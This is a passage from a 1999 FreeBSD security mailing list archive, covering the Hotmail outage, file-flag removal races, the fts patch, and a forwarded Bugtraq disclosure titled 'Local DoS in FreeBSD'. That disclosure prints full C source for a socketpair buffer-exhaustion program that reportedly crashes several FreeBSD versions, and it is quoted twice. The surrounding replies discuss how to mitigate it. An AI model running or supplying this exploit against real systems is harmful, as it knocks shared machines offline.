ls(1) will print it as `uchg'. The only purpose of the bad abbreviations seems to be to limit line lengths in ls -lo listings. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20:22:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp6.mindspring.com (smtp6.mindspring.com [207.69.200.74]) by hub.freebsd.org (Postfix) with ESMTP id 195791546E for ; Tue, 31 Aug 1999 20:22:09 -0700 (PDT) (envelope-from stuyman@confusion.net) Received: from confusion.net (user-2iveap9.dialup.mindspring.com [165.247.43.41]) by smtp6.mindspring.com (8.8.5/8.8.5) with ESMTP id XAA01073; Tue, 31 Aug 1999 23:22:03 -0400 (EDT) Message-ID: <37CC9BC7.45CE961E@confusion.net> Date: Tue, 31 Aug 1999 23:21:43 -0400 From: Laurence Berland Organization: B.R.A.T.T. X-Mailer: Mozilla 4.5 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Liam Slusser Cc: Kevin Lynn , Peter Kok , security@FreeBSD.ORG Subject: Re: hotmail References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Last I heard the frontend that served up the pages was FreeBSD, and the mail backend for incoming and outgoing mail was Solaris. BTW the exploit was just telling the cgi script you wanted the post-login page or some page just after login that you wanted that page, and it just assumed that you were already authenticated (which you weren't). Nothing to do with freebsd, just a bad cgi program. Liam Slusser wrote: > > I thought hotmail was using Sun hardware running Solaris? Anybody > know? > > liam > > System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage > www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address > Lowered turbo powered Honda Civic's are really cool. <---------- my quote > > On Tue, 31 Aug 1999, Kevin Lynn wrote: > > > Yes.. but chances are it's because of a security hole that wasn't because > > of freebsd as slashdot posted something about the security hole being > > exploitable via some web page that would let you read other peoples mail. > > > > Kevin > > > > On Wed, 1 Sep 1999, Peter Kok wrote: > > > > > Hello all > > > > > > I heard from news that hotmail was broken and the service was forced to > > > stop about two hours. As i know hotmail is operated by freebsd. Is it > > > about the security of freebsd? > > > Now I would like to know more about security of freebsd. > > > > > > thank you > > > > > > regards > > > Peter > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Laurence Berland, Stuyvesant HS Debate <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> Windows 98: n. useless extension to a minor patch release for 32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand for 1 bit of competition. http://stuy.debate.net icq #7434346 aol imer E1101 The above email Copyright (C) 1999 Laurence Berland All rights reserved To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20:31:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from magnesium.net (toxic.magnesium.net [204.188.6.238]) by hub.freebsd.org (Postfix) with SMTP id 94D351544E for ; Tue, 31 Aug 1999 20:31:23 -0700 (PDT) (envelope-from unfurl@magnesium.net) Received: (qmail 8699 invoked by uid 1001); 1 Sep 1999 03:30:22 -0000 Date: Tue, 31 Aug 1999 20:30:22 -0700 From: Bill Swingle To: Laurence Berland Cc: Liam Slusser , Kevin Lynn , Peter Kok , security@FreeBSD.ORG Subject: Re: hotmail Message-ID: <19990831203022.A8558@dub.net> References: <37CC9BC7.45CE961E@confusion.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <37CC9BC7.45CE961E@confusion.net>; from Laurence Berland on Tue, Aug 31, 1999 at 11:21:43PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is correct. Hotmail has ~1800 FreeBSD boxen as webservers and their database stuff is run on Sun boxen running Solaris. -Bill On Tue, Aug 31, 1999 at 11:21:43PM -0400, Laurence Berland wrote: > Last I heard the frontend that served up the pages was FreeBSD, and the > mail backend for incoming and outgoing mail was Solaris. BTW the > exploit was just telling the cgi script you wanted the post-login page > or some page just after login that you wanted that page, and it just > assumed that you were already authenticated (which you weren't). > Nothing to do with freebsd, just a bad cgi program. > > Liam Slusser wrote: > > > > I thought hotmail was using Sun hardware running Solaris? Anybody > > know? > > > > liam -- -=| --- B i l l S w i n g l e --- http://www.dub.net/ -=| unfurl@dub.net - unfurl@freebsd.org - bill@cdrom.com -=| Different all twisty a of in maze are you, passages little To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20:32:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 8A9171546E for ; Tue, 31 Aug 1999 20:32:38 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id UAA67875; Tue, 31 Aug 1999 20:31:34 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Liam Slusser Cc: Kevin Lynn , Peter Kok , security@FreeBSD.ORG Subject: Re: hotmail In-reply-to: Your message of "Tue, 31 Aug 1999 20:12:31 PDT." Date: Tue, 31 Aug 1999 20:31:34 -0700 Message-ID: <67872.936156694@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I thought hotmail was using Sun hardware running Solaris? Anybody > know? They're using both. FreeBSD runs the front end, Solaris runs the back end. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20:38:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 7CCAC15256 for ; Tue, 31 Aug 1999 20:38:38 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Tue, 31 Aug 1999 21:38:09 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma022076; Tue, 31 Aug 99 21:37:49 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id VAA21089; Tue, 31 Aug 1999 21:36:44 -0600 (MDT) Date: Tue, 31 Aug 1999 21:36:44 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com Reply-To: Paul Hart To: Markus Holmberg Cc: freebsd-security@FreeBSD.ORG Subject: Re: how to remove directories made by the core-following-symlink test code? In-Reply-To: <19990901032316.A8300@montezuma.acc.umu.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Sep 1999, Markus Holmberg wrote: > Am I missing something very trivial here, or how am I supposed to do to > remove the very deep directory structure that was made by the > core-follow-symlink test/exploit/whatever code? Try a version of rm that does not use the fts(3) routines to traverse the directory tree. I found that the GNU rm in the fileutils package worked for me. You can get the package at: ftp://ftp.gnu.org/pub/gnu/fileutils/ You could also write a quick recursive remover with readdir(3) and friends. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 21:25:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id 12FC61509A for ; Tue, 31 Aug 1999 21:25:20 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11M1w4-0004L2-00; Tue, 31 Aug 1999 22:23:48 -0600 Message-ID: <37CCAA52.74E1C9D1@softweyr.com> Date: Tue, 31 Aug 1999 22:23:46 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Bill Swingle Cc: Laurence Berland , Liam Slusser , Kevin Lynn , Peter Kok , security@FreeBSD.ORG Subject: Re: hotmail References: <37CC9BC7.45CE961E@confusion.net> <19990831203022.A8558@dub.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Swingle wrote: > > This is correct. Hotmail has ~1800 FreeBSD boxen as webservers and their > database stuff is run on Sun boxen running Solaris. And Oracle. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 23:41: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 1787014C0C for ; Tue, 31 Aug 1999 23:41:02 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA10641; Wed, 1 Sep 1999 00:41:01 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA16059; Wed, 1 Sep 1999 00:40:41 -0600 (MDT) Message-Id: <199909010640.AAA16059@harmony.village.org> To: Frank Tobin Subject: Re: Not sure if you got it... Cc: FreeBSD-security Mailing List In-reply-to: Your message of "Tue, 31 Aug 1999 10:56:40 CDT." References: Date: Wed, 01 Sep 1999 00:40:41 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Frank Tobin writes: : 3) Use chflags -R , followed by rm -rf. This two step : process is consistent with unix philosophy. This is probably the cleanest : (traditionally) solution. However, it causes two disk passes instead of : one. And might also have a race condition in it, since if someone adds a flag after the chflags -R has gone over it, rm will not be able to remove the file. : 4) Use find(1) with -exec chflags and rm. This has the downside of many : processes getting started (one chflags and one rm for each node), and : again, more disk usage (we don't all use SCSI yet). 5) find -delete should take all measures that it can to remove the file. The whole file flags thing was a cool idea, but it is a PITA and likely shouldn't have been implemented the way it was:-( Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 0:18:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id A807C15459 for ; Wed, 1 Sep 1999 00:18:39 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id AAA73783; Wed, 1 Sep 1999 00:17:56 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909010717.AAA73783@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199909010640.AAA16059@harmony.village.org> from Warner Losh at "Sep 1, 1999 00:40:41 am" To: imp@village.org (Warner Losh) Date: Wed, 1 Sep 1999 00:17:56 -0700 (PDT) Cc: ftobin@uiuc.edu (Frank Tobin), freebsd-security@FreeBSD.ORG (FreeBSD-security Mailing List) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message Frank Tobin writes: > : 3) Use chflags -R , followed by rm -rf. This two step > : process is consistent with unix philosophy. This is probably the cleanest > : (traditionally) solution. However, it causes two disk passes instead of > : one. > > And might also have a race condition in it, since if someone adds a > flag after the chflags -R has gone over it, rm will not be able to > remove the file. And just how would you implement rf -rF that this window was eliminated? It would be greatly narrowed, but it would be next to imposible to eliminate unless you started to do mandatory locking on directories, or implementing an additional system call that was ``unlink regardless of flags'', or bent the current unlink/rmdir to take additional options. Infact, how does rm -rf deal with someone possibly comming along with a chmod 0 filename stuck in a nice tight loop??? rm is full of race conditions, especially when run with -i :-). Has anyone else seen the point I raise about creeeeeeping featuresism, and perhaps understand why I get so vocal about some of this stuff? Implementations have to be very carefully planned, studied for problems, tested for problems, and then looked at by ``devils advocates'' before they can be considered real. -R can never be made race safe until mandatory locking is implemented. > > : 4) Use find(1) with -exec chflags and rm. This has the downside of many > : processes getting started (one chflags and one rm for each node), and > : again, more disk usage (we don't all use SCSI yet). > > 5) find -delete should take all measures that it can to remove the file. I strongly disagree. I didn't even know find had a -delete option, of I want find to delete for me I pipe to xargs rm. > > The whole file flags thing was a cool idea, but it is a PITA and > likely shouldn't have been implemented the way it was:-( Can we have a knob to turn it off TOTATALLY OFF, please please please. Even if it's compile time. It has become such a PITA it has created security problems, probably more DOS problems than it ever solved. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 7:18:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2E74614C24 for ; Wed, 1 Sep 1999 07:18:35 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id KAA05955; Wed, 1 Sep 1999 10:18:06 -0400 (EDT) (envelope-from wollman) Date: Wed, 1 Sep 1999 10:18:06 -0400 (EDT) From: Garrett Wollman Message-Id: <199909011418.KAA05955@khavrinen.lcs.mit.edu> To: Warner Losh Cc: FreeBSD-security Mailing List Subject: Re: Not sure if you got it... In-Reply-To: <199909010640.AAA16059@harmony.village.org> References: <199909010640.AAA16059@harmony.village.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > The whole file flags thing was a cool idea, but it is a PITA and > likely shouldn't have been implemented the way it was:-( nodump is incredibly useful and clearly the right thing, at least for those of us who must worry about FERPA. (Not to mention subpoenas!) -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 9:33:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from tad.cetlink.net (tad.cetlink.net [209.198.2.10]) by hub.freebsd.org (Postfix) with ESMTP id 892E114D07 for ; Wed, 1 Sep 1999 09:33:14 -0700 (PDT) (envelope-from jeff@tad.cetlink.net) Received: (from jeff@localhost) by tad.cetlink.net (8.9.2/8.9.1) id MAA00386 for freebsd-security@freebsd.org; Wed, 1 Sep 1999 12:33:06 -0400 (EDT) (envelope-from jeff) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 Date: Wed, 01 Sep 1999 12:33:06 -0400 (EDT) Organization: CETLink.Net From: Jeff Wheat To: freebsd-security@freebsd.org Subject: FW: Local DoS in FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have just verified that this code will indeed crash the following systems: Intel: 2.2.2, 2.2.6, 2.2.7, 2.2.8, 3.0, 3.1 Alpha: 4.0-19990809-SNAP Regards, Jeff -----FW: ----- Date: Fri, 27 Aug 1999 00:43:47 -0400 Sender: Bugtraq List From: "L. Sassaman" To: BUGTRAQ@SECURITYFOCUS.COM Subject: Local DoS in FreeBSD -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 This was first posted to the FreeBSD security list on the 9th of August, subsequently discussed on freebsd-stable and freebsd-hackers... no one seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x machines consistantly. I have also been told that it affects NetBSD and OpenBSD, though I haven't confirmed it. Someone with the know-how care to fix? L. Sassaman System Administrator | "Even the most primitive society has Technology Consultant | an innate respect for the insane." icq.. 10735603 | pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke - --- #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } return(0); } -----BEGIN PGP SIGNATURE----- Version: GnuPG v0.9.10 (GNU/Linux) Comment: OpenPGP Encrypted Email Preferred. iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91 TkVIqNdQpRi8CK9vySilouE= =7ufs -----END PGP SIGNATURE----- --------------End of forwarded message------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 9:50:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 57BDE14DA5 for ; Wed, 1 Sep 1999 09:50:52 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Wed, 1 Sep 1999 10:50:32 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma009798; Wed, 1 Sep 99 10:50:15 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA22186; Wed, 1 Sep 1999 10:49:08 -0600 (MDT) Date: Wed, 1 Sep 1999 10:49:08 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com Reply-To: Paul Hart To: freebsd-security@freebsd.org Subject: No patch yet for fts? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It looks like we've got kernel patches now to prevent core dumps from following symbolic links which is excellent, but has anyone looked at committing OpenBSD's fts(3) patch? See: http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-08-22&msg=199908271534.JAA27164@xerxes.cs.colorado.edu http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c?r1=1.18&r2=1.19 It looks like integrating that patch would allow us to put this entire fts hole behind us for good. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 10:46:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from free-bsd.org (edslppp4.dnvr.uswest.net [216.160.128.4]) by hub.freebsd.org (Postfix) with ESMTP id AB91014C18 for ; Wed, 1 Sep 1999 10:46:40 -0700 (PDT) (envelope-from geniusj@free-bsd.org) Received: from localhost (geniusj@localhost) by free-bsd.org (8.9.3/8.9.3) with ESMTP id LAA18942; Wed, 1 Sep 1999 11:49:41 -0600 (MDT) (envelope-from geniusj@free-bsd.org) Date: Wed, 1 Sep 1999 11:49:41 -0600 (MDT) From: FreeBSD -- The Power to Serve To: Jeff Wheat Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you have public access users, you should have login accounting in the first place.. and yes, it does stop it :).. I verified this on a 3.2 box with my login accounting setup.. On Wed, 1 Sep 1999, Jeff Wheat wrote: > I have just verified that this code will indeed crash the following > systems: > > Intel: 2.2.2, 2.2.6, 2.2.7, 2.2.8, 3.0, 3.1 > > Alpha: 4.0-19990809-SNAP > > > Regards, > Jeff > > -----FW: ----- > > Date: Fri, 27 Aug 1999 00:43:47 -0400 > Sender: Bugtraq List > From: "L. Sassaman" > To: BUGTRAQ@SECURITYFOCUS.COM > Subject: Local DoS in FreeBSD > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > This was first posted to the FreeBSD security list on the 9th of August, > subsequently discussed on freebsd-stable and freebsd-hackers... no one > seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x > machines consistantly. I have also been told that it affects NetBSD and > OpenBSD, though I haven't confirmed it. > > Someone with the know-how care to fix? > > > > L. Sassaman > > System Administrator | "Even the most primitive society has > Technology Consultant | an innate respect for the insane." > icq.. 10735603 | > pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke > > > - --- > > > #include > #include > #include > > #define BUFFERSIZE 204800 > > extern int > main(void) > { > int p[2], i; > char crap[BUFFERSIZE]; > > while (1) > { > if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) > break; > i = BUFFERSIZE; > setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > fcntl(p[0], F_SETFL, O_NONBLOCK); > fcntl(p[1], F_SETFL, O_NONBLOCK); > write(p[0], crap, BUFFERSIZE); > write(p[1], crap, BUFFERSIZE); > } > > return(0); > } > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v0.9.10 (GNU/Linux) > Comment: OpenPGP Encrypted Email Preferred. > > iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91 > TkVIqNdQpRi8CK9vySilouE= > =7ufs > -----END PGP SIGNATURE----- > > --------------End of forwarded message------------------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 11: 6:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id B38061517A for ; Wed, 1 Sep 1999 11:06:44 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id OAA07516; Wed, 1 Sep 1999 14:05:47 -0400 (EDT) Message-Id: <3.0.5.32.19990901140428.01f197b0@staff.sentex.ca> X-Sender: mdtpop@staff.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Wed, 01 Sep 1999 14:04:28 -0400 To: FreeBSD -- The Power to Serve From: Mike Tancsa Subject: Re: FW: Local DoS in FreeBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: >If you have public access users, you should have login accounting in the >first place.. and yes, it does stop it :).. I verified this on a 3.2 box >with my login accounting setup.. How does accounting stop it ? Or do you mean it just discourages users from doing it ? How much overhead does accounting add to the system ? Also, limiting the amount of file descriptors can prevent it, as the 'bug' is essentially a resource starving issue (e.g. fork bomb) ---Mike ------------------------------------------------------------------------ Mike Tancsa, tel 01.519.651.3400 Network Administrator, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 13: 9:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from free-bsd.org (edslppp4.dnvr.uswest.net [216.160.128.4]) by hub.freebsd.org (Postfix) with ESMTP id 2288914BCF for ; Wed, 1 Sep 1999 13:09:05 -0700 (PDT) (envelope-from geniusj@free-bsd.org) Received: from localhost (geniusj@localhost) by free-bsd.org (8.9.3/8.9.3) with ESMTP id OAA19277; Wed, 1 Sep 1999 14:10:32 -0600 (MDT) (envelope-from geniusj@free-bsd.org) Date: Wed, 1 Sep 1999 14:10:32 -0600 (MDT) From: FreeBSD -- The Power to Serve To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <3.0.5.32.19990901140428.01f197b0@staff.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU time so you can limit that too.. It will never crash the system with the proper limits set :). They can run it all they want. On Wed, 1 Sep 1999, Mike Tancsa wrote: > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > >If you have public access users, you should have login accounting in the > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box > >with my login accounting setup.. > > How does accounting stop it ? Or do you mean it just discourages users > from doing it ? How much overhead does accounting add to the system ? > Also, limiting the amount of file descriptors can prevent it, as the 'bug' > is essentially a resource starving issue (e.g. fork bomb) > > ---Mike > ------------------------------------------------------------------------ > Mike Tancsa, tel 01.519.651.3400 > Network Administrator, mike@sentex.net > Sentex Communications www.sentex.net > Cambridge, Ontario Canada > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 13:22:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id BA25C14BCF for ; Wed, 1 Sep 1999 13:22:18 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id QAA18232; Wed, 1 Sep 1999 16:22:11 -0400 (EDT) Message-Id: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca> X-Sender: mdtpop@staff.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Wed, 01 Sep 1999 16:20:52 -0400 To: FreeBSD -- The Power to Serve From: Mike Tancsa Subject: Re: FW: Local DoS in FreeBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <3.0.5.32.19990901140428.01f197b0@staff.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: >Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU >time so you can limit that too.. It will never crash the system with the >proper limits set :). They can run it all they want. Well, that sort of helps for kids just doing ./a.out, but would you put accounting limits on your web server ? That seems like a nasty can of configuration worms one would be opening no ? ---Mike > >On Wed, 1 Sep 1999, Mike Tancsa wrote: > >> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: >> >If you have public access users, you should have login accounting in the >> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box >> >with my login accounting setup.. >> >> How does accounting stop it ? Or do you mean it just discourages users >> from doing it ? How much overhead does accounting add to the system ? >> Also, limiting the amount of file descriptors can prevent it, as the 'bug' >> is essentially a resource starving issue (e.g. fork bomb) >> >> ---Mike >> ------------------------------------------------------------------------ >> Mike Tancsa, tel 01.519.651.3400 >> Network Administrator, mike@sentex.net >> Sentex Communications www.sentex.net >> Cambridge, Ontario Canada >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > > ------------------------------------------------------------------------ Mike Tancsa, tel 01.519.651.3400 Network Administrator, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 13:38: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.skylink.it (ns.skylink.it [194.177.113.1]) by hub.freebsd.org (Postfix) with ESMTP id 4DCEC15542 